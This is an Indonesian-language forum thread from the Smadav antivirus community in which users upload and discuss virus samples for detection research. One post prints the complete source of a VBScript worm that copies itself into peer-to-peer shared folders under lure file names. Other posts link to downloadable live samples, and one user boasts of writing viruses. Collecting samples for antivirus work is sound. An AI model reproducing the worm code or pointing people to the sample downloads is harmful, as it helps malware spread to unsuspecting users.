Virus yang satu ini saya kategorikan cukup canggih (tidak secanggih conficker my likeness virus) tetapi dapat menjebol kode ASCII pada smadav

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada November 27, 2009, 07:10:17 PM
ada bingkisan virus buat Smadav... Runonce.worm



Nah ini dia 'biang kerok'-nya yang membuat semua file *.exe dilahap ketika diclean dengan PCMAV :D

Virus ini sepertinya lg In the wild :D... banyak ditemukan di warnet2.... ada Variannya yg berbentuk seperti Kotak Surat /message... :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada November 27, 2009, 07:24:34 PM
Aku punya firus yang gak ke detek smadav...
Ada juga yang berhasil masuk folder smad lock smadav...
Moga di rev selanjutnya bisa ke detec :-X
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada November 27, 2009, 10:15:08 PM
Aku punya firus yang gak ke detek smadav...
Ada juga yang berhasil masuk folder smad lock smadav...
Moga di rev selanjutnya bisa ke detec :-X

Emang ada kira-kira 5% virus lokal yang bisa masuk folder Smad-Lock, tapi hampir tidak ada yang bisa menginfeksi dokumen di dalamnya :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada November 28, 2009, 12:54:33 PM
Sipt  :-bd
Moga trojan yg boot.exe bisa ke deteck smadav di rev selanjutnya...Karena aku sering dapet firus itu
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: valtz pada Desember 01, 2009, 09:43:33 AM
owh gitu.. jadi misal kita taruh itu file di dalam brankas smadav keamanan file terjamin?
jd ga bsa terinfeksi gitu?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Desember 01, 2009, 09:48:22 AM
owh gitu.. jadi misal kita taruh itu file di dalam brankas smadav keamanan file terjamin?
jd ga bsa terinfeksi gitu?

Akan optimal bila filenya seperti word,excel dll.....

Untuk lebih lengkap silahkan dibahas disini http://forum.smadav.net/index.php?topic=268.390 (http://forum.smadav.net/index.php?topic=268.390)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Bambang Marhiyanto pada Desember 02, 2009, 06:54:37 PM
Smadav versi 7.4 kok cuma bisa deteksi virus Sality.G. Gimana nih. Tolong dibantu dong
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 03, 2009, 10:03:43 AM
Merlin lagi... :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 03, 2009, 11:34:20 AM
Runonce lagi.. ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ViGunZ pada Desember 03, 2009, 11:38:48 AM
@yudh

Runonce sama Merlin Virus Luar apa Lokal yudh, kenapa ngak sekalian 1 packed  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 03, 2009, 11:42:53 AM
yg merlin kayanya virus lokal deh.... bisa kelihatan script nya tuh... ;)
klo ronunce spertinya virus Luar.... :)

he...he... baru nemu soalnya, jadi ngga skalian 1 packed... :D ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 04, 2009, 05:25:06 PM
Sampel virus baru :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 05, 2009, 10:37:30 AM
New Virus... <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 05, 2009, 10:58:20 AM
Smadav belum bisa mendeteksi virus ini..... saat ini cukup banyak menyebar di warnet2...,  ;)

hampir di tiap folder selalu ada....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 05, 2009, 11:05:17 AM
ada lagi........ ;)

Nimda.htm.Worm
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ViGunZ pada Desember 05, 2009, 11:13:42 AM
@yudh

Banyak amat Koleksi virusnya, jadiin satu packet aja Upload samplenya  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada Desember 05, 2009, 01:31:08 PM
Ok virus-virus diterima untuk diteliti :D

Upload juga virus-virus baru yang lain disini :
http://www.smadav.net/index.php?page=upload

Itu fitur upload virus smadav yang baru, tidak lagi menggunakan 4shared yang lambat :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 05, 2009, 01:52:07 PM
Upload juga virus-virus baru yang lain disini :
http://www.smadav.net/index.php?page=upload

Ok, sebelumnya sudah saya lakukan ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: davinda pada Desember 05, 2009, 02:55:05 PM
tooooolooooong mas smadaver
agar bisa naklukin sality e, sality d?
pleasee....?
 ^:)^ ^:)^ ^:)^ ^:)^ ^:)^ ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 05, 2009, 03:08:14 PM
tooooolooooong mas smadaver
agar bisa naklukin sality e, sality d?
pleasee....?
 ^:)^ ^:)^ ^:)^ ^:)^ ^:)^ ^:)^

Coba Anda mampir  kesini  (http://vaksin.com/2009/0309/Sality/sality.html) :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 05, 2009, 03:22:42 PM
Suspected virus... ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Desember 05, 2009, 03:22:59 PM
iyaaa,, uda harboot tes halaman uploadnyaaa,,
mantabz,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 05, 2009, 03:35:40 PM
Suspected Viruss...  :-*
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cangcilung pada Desember 05, 2009, 04:02:57 PM
ini sampel virus bukan? http://forum.smadav.net/index.php?topic=2409.msg41826#msg41826 di KIS 2010 detek sbagai trojan.win32.Buzus.crxs core'a di windows/system32/wmispqd.exe
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 05, 2009, 04:04:48 PM
Ini virus spertinya..... ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Desember 05, 2009, 04:04:56 PM
http://www.smadav.net/upload/

koq kalian dpt virus mulu yaaa??
harboot sepi2 ajaaa,, warnet yakz?
atw buka situs bokep?? kan pengen bs upload jugaaa,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 05, 2009, 04:08:57 PM
http://www.smadav.net/upload/

koq kalian dpt virus mulu yaaa??
harboot sepi2 ajaaa,, warnet yakz?
atw buka situs bokep?? kan pengen bs upload jugaaa,,

Warnet di wilayah sekitar kampus biasanya subur2... :D :D apalg yg nmanya video bocep... bnyak bgt ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cangcilung pada Desember 05, 2009, 04:09:19 PM
Ini virus spertinya..... ???
iy sih kek'a sempet hang bentar kompi tp untung'a bisa di clean, gwat klo kena virus kompi kantor :(
Ini virus spertinya..... ???
itu dari TS imank boot w coba donlot aja eh bener virus..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada Desember 05, 2009, 04:09:46 PM
http://www.smadav.net/upload/

koq kalian dpt virus mulu yaaa??
harboot sepi2 ajaaa,, warnet yakz?
atw buka situs bokep?? kan pengen bs upload jugaaa,,

Mantap kan File Uploader nya (www.virus4.com) ?
Setelah beberapa bulan mencari,
akhirnya saya bisa dapat ajax php script gratis buat upload dengan progress bar   :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 05, 2009, 04:11:56 PM
Awas  om... hati2.... virus kadang pakai cara2 yg bikin kita pengen nge-klik... ;) ;) :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cangcilung pada Desember 05, 2009, 04:17:14 PM
Awas  om... hati2.... virus kadang pakai cara2 yg bikin kita pengen nge-klik... ;) ;) :D
iya sih, tp mang penasaran juga ( sifat manusia ga da kamus tidak/dilarang ) :D :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ajojing pada Desember 06, 2009, 05:44:30 PM
ini sampel virus bukan? http://forum.smadav.net/index.php?topic=2409.msg41826#msg41826 di KIS 2010 detek sbagai trojan.win32.Buzus.crxs core'a di windows/system32/wmispqd.exe


ini emg virus yg (menurut saya) masih dlm tenar2nya, soalnya dlm seminggu terakhir byk yg sand all ke ym saya

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Choppedcity pada Desember 07, 2009, 06:15:34 AM
Laporan Trojan:

gak tau bwt cr*** apaan nih...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: andri099 pada Desember 07, 2009, 03:12:02 PM
anjritttzz cepet bgt uploadnya...

Penyempurnaan web Smadav.net :
  • Tidak lagi static, tapi sudah dynamic menggunakan PHP & MySQL
  • Penambahan counter jumlah download dan button image Smadav Pro
  • Penambahan fitur upload yang lebih cepat dan mudah, tidak ke server 4shared US lagi, tapi langsung ke server smadav.net Indonesia. Silakan dicoba disini untuk mengetes : http://www.smadav.net/index.php?page=upload
muantap.....
back to topic

bawaan windows apa bukan neh?  =))
neh samplenya gan

anjritttzz cepet bgt uploadnya...

Penyempurnaan web Smadav.net :
  • Tidak lagi static, tapi sudah dynamic menggunakan PHP & MySQL
  • Penambahan counter jumlah download dan button image Smadav Pro
  • Penambahan fitur upload yang lebih cepat dan mudah, tidak ke server 4shared US lagi, tapi langsung ke server smadav.net Indonesia. Silakan dicoba disini untuk mengetes : http://www.smadav.net/index.php?page=upload
muantap.....
back to topic

bawaan windows apa bukan neh?  =))
neh samplenya gan


di virus total... NIHIL... Bersih.. :) :)

pencerahannya gann  ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 07, 2009, 05:41:21 PM
Trojan..... :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 07, 2009, 07:50:06 PM
anjritttzz cepet bgt uploadnya...

Penyempurnaan web Smadav.net :
  • Tidak lagi static, tapi sudah dynamic menggunakan PHP & MySQL
  • Penambahan counter jumlah download dan button image Smadav Pro
  • Penambahan fitur upload yang lebih cepat dan mudah, tidak ke server 4shared US lagi, tapi langsung ke server smadav.net Indonesia. Silakan dicoba disini untuk mengetes : http://www.smadav.net/index.php?page=upload
muantap.....
back to topic

bawaan windows apa bukan neh?  =))
neh samplenya gan


di virus total... NIHIL... Bersih.. :) :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: andri099 pada Desember 07, 2009, 07:58:18 PM
anjritttzz cepet bgt uploadnya...

Penyempurnaan web Smadav.net :
  • Tidak lagi static, tapi sudah dynamic menggunakan PHP & MySQL
  • Penambahan counter jumlah download dan button image Smadav Pro
  • Penambahan fitur upload yang lebih cepat dan mudah, tidak ke server 4shared US lagi, tapi langsung ke server smadav.net Indonesia. Silakan dicoba disini untuk mengetes : http://www.smadav.net/index.php?page=upload
muantap.....
back to topic

bawaan windows apa bukan neh?  =))
neh samplenya gan


di virus total... NIHIL... Bersih.. :) :)
dah tau..tapi gua lom yakin...menurut analisis lu apaan tuh file file itu? windows kah?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 07, 2009, 08:05:39 PM
Spertinya sih asli....dr yg ku lihat mungkin file itu dari hasil update otomatis windows mu.... mungkin dari service pack yang , misal: KB975678....


spaya lebih tenang, coba contact bagian Viser Smadav, ato mas Zai... ;) ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: andri099 pada Desember 07, 2009, 11:40:51 PM
Spertinya sih asli....dr yg ku lihat mungkin file itu dari hasil update otomatis windows mu.... mungkin dari service pack yang , misal: KB975678....


spaya lebih tenang, coba contact bagian Viser Smadav, ato mas Zai... ;) ;)
saya menduga mungkin itu file bekas updatean windowsnya  :-\
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 08, 2009, 09:33:55 PM
Virus baru (trojan) :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: andri099 pada Desember 09, 2009, 01:30:46 AM
Virus baru (trojan) :)
weks virus artis tu gannzz..... :-\
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: niko0524 pada Desember 09, 2009, 07:56:19 PM
langsung direct link aja
http://www.shockingsoft.com/soft/MultiPacker.zip

di forum sebelah ini buat bikin aplikasi jadi portabel.
eh pas mua instal ke blok sama kis 2010 gw.
gw kira false alarm.
gw instal.
gw bikin portabel aplikasi.
pas gw test di vmware trus pake xp.
pas jalanin tuh progie.
ancur dah.
abis tulisan windows eror bla..bla.. memory not found.

untung ane pake windows 7 tuh virus g aktif jadinya.
di scan pake kis 2010 kena trojan generic apa gt, lupa.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: crazywork pada Desember 10, 2009, 08:26:26 AM
Halo abang2 sekalia,,,,,numpang nanya dong,,saya pake antivirus smadav 7.4 tapi kok komputer saya tidak bisa mendetek smadav tersebut sebagai anti virus?windows memperingatkan :"windows did not find antivirus software on this computer".Apakah ini menjadi masalah nantinya??Tolong nasihat dari Abang2 semua,,Thx Much... :) :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: andri099 pada Desember 10, 2009, 02:27:17 PM
Halo abang2 sekalia,,,,,numpang nanya dong,,saya pake antivirus smadav 7.4 tapi kok komputer saya tidak bisa mendetek smadav tersebut sebagai anti virus?windows memperingatkan :"windows did not find antivirus software on this computer".Apakah ini menjadi masalah nantinya??Tolong nasihat dari Abang2 semua,,Thx Much... :) :)
lah smadav anti virus lokal....AvLok=Anti virus lokal...ya mungkin merk av kita ga di register ke windows sana/atau pemberitahuan ke windows... kalo mau lebih pastinya tanya fonder smadav  ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Desember 10, 2009, 02:55:13 PM
Halo abang2 sekalia,,,,,numpang nanya dong,,saya pake antivirus smadav 7.4 tapi kok komputer saya tidak bisa mendetek smadav tersebut sebagai anti virus?windows memperingatkan :"windows did not find antivirus software on this computer".Apakah ini menjadi masalah nantinya??Tolong nasihat dari Abang2 semua,,Thx Much... :) :)
lah smadav anti virus lokal....AvLok=Anti virus lokal...ya mungkin merk av kita ga di register ke windows sana/atau pemberitahuan ke windows... kalo mau lebih pastinya tanya fonder smadav  ;>


om....
setahu saya nih,windows[microsoft] hanya menditeksi anti virus import saja....kalau lokal itu gak masuk hitungan...
dan pasti akan muncul out fo date...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: IloovSmadav pada Desember 10, 2009, 04:56:51 PM
KK saya Pernah Nih Kenak Virus Sality... >:(
              Ada Yang Tau G???? ???
Kalo Bisa Gua Upload tin Virus Nya Thanks........ ;) :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: andri099 pada Desember 10, 2009, 08:38:41 PM
KK saya Pernah Nih Kenak Virus Sality... >:(
              Ada Yang Tau G???? ???
Kalo Bisa Gua Upload tin Virus Nya Thanks........ ;) :-bd
Sality G maksudnya gan? itu salah satu variant sality...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: crazywork pada Desember 11, 2009, 07:49:17 AM
ooo,,,gt yap,,,makasih banyak yap infonya,,,, :D :D :D :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Paul_Gatik pada Desember 11, 2009, 09:57:41 AM
Upload ke home smadav tambah keren euy
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 11, 2009, 11:13:29 AM
Moga pada Revisi berikutnya smadav bisa membasmi virus Email worm yang waktu itu saya Upload ke forum... :) :)

http://forum.smadav.net/index.php?topic=566.190
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 17, 2009, 07:53:25 PM
vbs.script
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 17, 2009, 08:19:56 PM
Mita.VBS

Smadav blum bs detek... :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Wisnu Pramudya pada Desember 18, 2009, 10:36:21 PM
Om momod,tlng dibuatkan thread khusus bwt naro uplod2 virus,agar terlihat rapi,jgn lpa dksih warning agar tdk asal download.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ajojing pada Desember 22, 2009, 04:53:59 PM
Mita.VBS

Smadav blum bs detek... :)
Heuristic Vbs Smadav akan segera di perbaiki, krna klo di liat source codenya, emg tdk trlalu neko-neko  :D

Kode: [Pilih]
Set fso = CreateObject("Scripting.FileSystemObject")
   MyWorm = (WScript.ScriptFullName)
   KMD = ("C:\Program Files\KMD\My Shared Folder")& "\"
   Kazaa = ("C:\Program Files\Kazaa\My Shared Folder") & "\"
   KazaaLiteL = ("C:\Program Files\KaZaA Lite\My Shared Folder") & "\"
   Morpheus = ("C:\Program Files\Morpheus\My Shared Folder") & "\"
   Grokster = ("C:\Program Files\Grokster\My Grokster") & "\"
   BearShare = ("C:\Program Files\BearShare\Shared") & "\"
   Edonkey = ("C:\Program Files\Edonkey2000\Incoming") & "\"
   if fso.folderexists(KMD) then
      fso.copyfile MyWorm, KMD & "vagina.jpg.vbs"
      fso.copyfile MyWorm, KMD & "anti-virus installer.exe.vbs"
      fso.copyfile MyWorm, KMD & "Emeinem - f*** Me In The Ass.mp3.vbs"
   end if
   if fso.folderexists(Kazaa) then
      fso.copyfile MyWorm, Kazaa & "vagina.jpg.vbs"
      fso.copyfile MyWorm, Kazaa & "anti-virus installer.exe.vbs"
      fso.copyfile MyWorm, Kazaa & "Emeinem - f*** Me In The Ass.mp3.vbs"
   end if
   if fso.folderexists(KazaaLite) then
      fso.copyfile MyWorm, KazaaLite & "vagina.jpg.vbs"
      fso.copyfile MyWorm, KazaaLite & "anti-virus installer.exe.vbs"
      fso.copyfile MyWorm, KazaaLite & "Emeinem - f*** Me In The Ass.mp3.vbs"
   end if
   if fso.folderexists(Morpheus) then
      fso.copyfile MyWorm, Morpheus & "vagina.jpg.vbs"
      fso.copyfile MyWorm, Morpheus & "anti-virus installer.exe.vbs"
      fso.copyfile MyWorm, Morpheus & "Emeinem - f*** Me In The Ass.mp3.vbs"
   end if
   if fso.folderexists(Grokster) then
      fso.copyfile MyWorm, Grokster & "vagina.jpg.vbs"
      fso.copyfile MyWorm, Grokster & "anti-virus installer.exe.vbs"
      fso.copyfile MyWorm, Grokster & "Emeinem - f*** Me In The Ass.mp3.vbs"
   end if
   if fso.folderexists(BearShare) then
      fso.copyfile MyWorm, BearShare & "vagina.jpg.vbs"
      fso.copyfile MyWorm, BearShare & "anti-virus installer.exe.vbs"
      fso.copyfile MyWorm, BearShare & "Emeinem - f*** Me In The Ass.mp3.vbs"
   end if
   if fso.folderexists(Edonkey) then
      fso.copyfile MyWorm, Edonkey & "vagina.jpg.vbs"
      fso.copyfile MyWorm, Edonkey & "anti-virus installer.exe.vbs"
      fso.copyfile MyWorm, Edonkey & "Emeinem - f*** Me In The Ass.mp3.vbs"
   end if

Om momod,tlng dibuatkan thread khusus bwt naro uplod2 virus,agar terlihat rapi,jgn lpa dksih warning agar tdk asal download.
jadi sekarang trit ini di pke untuk apa? hehhe :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Cyvermont pada Desember 22, 2009, 05:00:03 PM
Om momod,tlng dibuatkan thread khusus bwt naro uplod2 virus,agar terlihat rapi,jgn lpa dksih warning agar tdk asal download.

iya ini kan buat uplod vorus gan.. lagian siapa sih yg mau asal donlod attachment di subtopic kayak gini.. wkwkwkw..  ;D ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: bolt pada Desember 24, 2009, 09:34:48 AM
pak minta tolong gimana caranya memberantas virus sality, soale virus ini bahaya laten bagi komp ane..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: aldo suhartono putra pada Desember 24, 2009, 10:30:42 AM
saya upload virus saya ke forum smadav. saya upload file dari karantina smadav saya.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Wisnu Pramudya pada Desember 24, 2009, 12:11:19 PM
@up: bisa dilihat di thread diskusi virus.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: aldo suhartono putra pada Desember 24, 2009, 12:32:34 PM
hei mau nanya klo upload firus bisa dari karantina smadav atau harus dalam lokasi asli dari file tersebut?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Desember 28, 2009, 11:25:51 AM
hei mau nanya klo upload firus bisa dari karantina smadav atau harus dalam lokasi asli dari file tersebut?
Terserah sih.. Tapi kalau diupload langsung tentu lebih disukai :D

Ini aku upload OSX.Niqtana.. kayaknya virus buat Mac OSX
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: trydi5 pada Desember 29, 2009, 06:16:32 PM
kq ane kmrn g bs upload y
apa gara2 browser ane yg g supprt plugin buat upload
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 31, 2009, 11:19:58 AM
Sampel virus baru chelsea_logo.jpg diubah menjadi chelsea_logo.exe :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Desember 31, 2009, 11:58:51 AM
Runonce.Worm  :)

klik linknya.... http://www.mediafire.com/?m2chy2hxzxm
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: andri099 pada Januari 03, 2010, 12:38:20 PM
IRC BOT virus
(http://www.bebe17.info/images/smilies/2jaf4b5.gif)
http://www.4shared.com/file/106807322/fb4864a/Bot_irc.html
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cakka pada Januari 09, 2010, 07:55:41 PM
cara mengirim virus nya gimana ya ?
thanks
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Januari 09, 2010, 08:02:57 PM
cara mengirim virus nya gimana ya ?
thanks
masukin ke Attachmen
caranya=klik reply,Additional Options...,attach,browse,pilih file virus


filenya di masukin ke arcive(.zip/.rar) dulu sebelumnya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Januari 11, 2010, 10:31:12 AM
Gen.Troj.Yahoo ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ran_TH pada Januari 12, 2010, 04:03:42 PM
False alarm niee...mohon diteliti.
File ini didapat dari Windows Debugging Tools x86, makanya saya gak yakin ini virus :-\
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Januari 12, 2010, 06:51:13 PM
virus bkan ya... apa false... ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Januari 12, 2010, 06:54:50 PM
virus bkan ya... apa false... ???

Sudah dites di www.virustotal.com belum sob ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Januari 12, 2010, 06:58:00 PM
virus bkan ya... apa false... ???

Sudah dites di www.virustotal.com belum sob ???
udah... hampir smuanya detek...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Januari 20, 2010, 09:19:33 AM
recycler varian... :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ran_TH pada Januari 25, 2010, 09:07:08 PM
Nemu nih program mencurigakan ketangkep sama Smad-Behavior....Avast gw malah gak ngeluarin peringatan apapun.
Program ini mengkopi dirinya ke folder C:\Documents and Settings\username\Application Data\Microsoft, lalu mengontak sebuah IP server...

Program ini dibuat dengan VB.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada Januari 25, 2010, 09:26:33 PM
@Ran_TH
Kemungkinan besar ini memang virus :)

Nanti akan dimasukkan db Smadav Rev. berikutnya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ran_TH pada Januari 25, 2010, 09:33:02 PM
@Ran_TH
Kemungkinan besar ini memang virus :)

Nanti akan dimasukkan db Smadav Rev. berikutnya
Oke mas Zai :D Udah discan pake MBAM ternyata tipenya Trojan.Downloader. Diupload ke virustotal.com malah hasilnya 0 threat ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: BULLUXZ pada Februari 07, 2010, 03:11:53 PM
Smadav cuma mendapat sample virus dr uploadan user apa jg pasang honeypot/honeynet sendiri gan?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Februari 07, 2010, 09:26:51 PM
@bulux,,
dari berbagai sumber,,
tp umumnya dari user,
dan riset programmernya sendiri,,

gak tau deh klo nyiapin trap juga,,
trap virus itu spt apa?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Februari 13, 2010, 03:45:08 PM
Honeypot itu biasanya berupa komputer yang dibiarkan online tanpa proteksi, sehingga memungkinkan hack attack, virus, dsb masuk ke komputernya, untuk ditangkap dan dianalisa :D
Selain komputer bisa juga berupa Virtual Machine, network, dsb
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Tsuzurumiya pada Februari 14, 2010, 05:12:38 AM
Ada yang punya sampel virus2 terbaru ngga? Yang belum bisa kedetek sama antivirus2 impor?  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Februari 14, 2010, 08:26:34 AM
Ada yang punya sampel virus2 terbaru ngga? Yang belum bisa kedetek sama antivirus2 impor?  :D
ada no di http://viruslab.tk (http://viruslab.tk) ada 3 KAV semua dr gen 1 - 3
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Februari 14, 2010, 07:10:10 PM
Ada yang punya sampel virus2 terbaru ngga? Yang belum bisa kedetek sama antivirus2 impor?  :D
ada no di http://viruslab.tk (http://viruslab.tk) ada 3 KAV semua dr gen 1 - 3

wew... ada shafry nih.. aq dah download sample mu shaf... mantap!!:D 
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Februari 14, 2010, 09:05:17 PM
Ada yang punya sampel virus2 terbaru ngga? Yang belum bisa kedetek sama antivirus2 impor?  :D
ada no di http://viruslab.tk (http://viruslab.tk) ada 3 KAV semua dr gen 1 - 3

wew... ada shafry nih.. aq dah download sample mu shaf... mantap!!:D 
oh kaw gmn? nyaman kan virus q yang ke 3
virus yang ke 4 keluarnya bersama Knight AV versi 2
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Februari 15, 2010, 10:20:24 AM
suspected worm
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Tsuzurumiya pada Februari 15, 2010, 02:25:38 PM
Ada yang punya sampel virus2 terbaru ngga? Yang belum bisa kedetek sama antivirus2 impor?  :D
ada no di http://viruslab.tk (http://viruslab.tk) ada 3 KAV semua dr gen 1 - 3
Waha... Ijin nyedot yah. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Februari 15, 2010, 03:49:55 PM
Ada yang punya sampel virus2 terbaru ngga? Yang belum bisa kedetek sama antivirus2 impor?  :D
ada no di http://viruslab.tk (http://viruslab.tk) ada 3 KAV semua dr gen 1 - 3
Waha... Ijin nyedot yah. :D
ya gpp
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: wong ndeso pada Februari 15, 2010, 05:42:11 PM
owhh... bitcu zaw . . . boleh g daku uplud sample virus disini??? soale ma NIS2010 g kedetect, kayaknya temenku yang naruh ke kompiku dech. . . please zaw  ^:)^ ^:)^ ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Februari 15, 2010, 06:39:42 PM
owhh... bitcu zaw . . . boleh g daku uplud sample virus disini??? soale ma NIS2010 g kedetect, kayaknya temenku yang naruh ke kompiku dech. . . please zaw  ^:)^ ^:)^ ^:)^
gw mnta tu virus ya
upload aja ke http://shafryvir.4shared.com/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: wong ndeso pada Februari 15, 2010, 07:46:29 PM
owhh... bitcu zaw . . . boleh g daku uplud sample virus disini??? soale ma NIS2010 g kedetect, kayaknya temenku yang naruh ke kompiku dech. . . please zaw  ^:)^ ^:)^ ^:)^
gw mnta tu virus ya
upload aja ke http://shafryvir.4shared.com/

bingung gan cara uplut ditempat yang 4shared  :-[

daku uplut disini aja zaw
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Februari 16, 2010, 04:47:48 PM
owhh... bitcu zaw . . . boleh g daku uplud sample virus disini??? soale ma NIS2010 g kedetect, kayaknya temenku yang naruh ke kompiku dech. . . please zaw  ^:)^ ^:)^ ^:)^
gw mnta tu virus ya
upload aja ke http://shafryvir.4shared.com/

bingung gan cara uplut ditempat yang 4shared  :-[

daku uplut disini aja zaw

virus apa tu. kok seperti exe cmn dalamnya ada lagi kayak g tw bwner aq.
kayaknya tu program vb yang di pack jadi atu trus jadi exe
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: wong ndeso pada Februari 17, 2010, 01:17:04 PM
owhh... bitcu zaw . . . boleh g daku uplud sample virus disini??? soale ma NIS2010 g kedetect, kayaknya temenku yang naruh ke kompiku dech. . . please zaw  ^:)^ ^:)^ ^:)^
gw mnta tu virus ya
upload aja ke http://shafryvir.4shared.com/

bingung gan cara uplut ditempat yang 4shared  :-[

daku uplut disini aja zaw

virus apa tu. kok seperti exe cmn dalamnya ada lagi kayak g tw bwner aq.
kayaknya tu program vb yang di pack jadi atu trus jadi exe

